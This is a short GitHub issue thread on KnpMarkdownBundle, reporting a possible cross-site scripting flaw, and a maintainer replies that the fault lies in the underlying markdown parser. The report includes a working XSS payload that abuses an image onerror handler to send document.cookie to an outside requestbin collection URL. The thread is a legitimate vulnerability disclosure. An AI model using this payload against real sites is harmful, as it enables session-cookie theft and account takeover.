### ISSUE TITLE
Security issue leading to XSS

### ISSUE THREAD

**Issue by kahla-sec** [KnpLabs/KnpMarkdownBundle#105]
Hello , I don't know if it's intended or not but this payload may lead to XSS vulnerability.

`![<img src="#" onerror="src='http://requestbin.net/r/12bfihl1?c='+document.cookie; this.onerror=null"/>](#){onerror=outerHTML=alt}`

**Comment by weaverryan** [comment]
I'm not sure if that's intended or not, but it would be an issue with the underlying markdown parser I believe, not in this library.

Cheers!
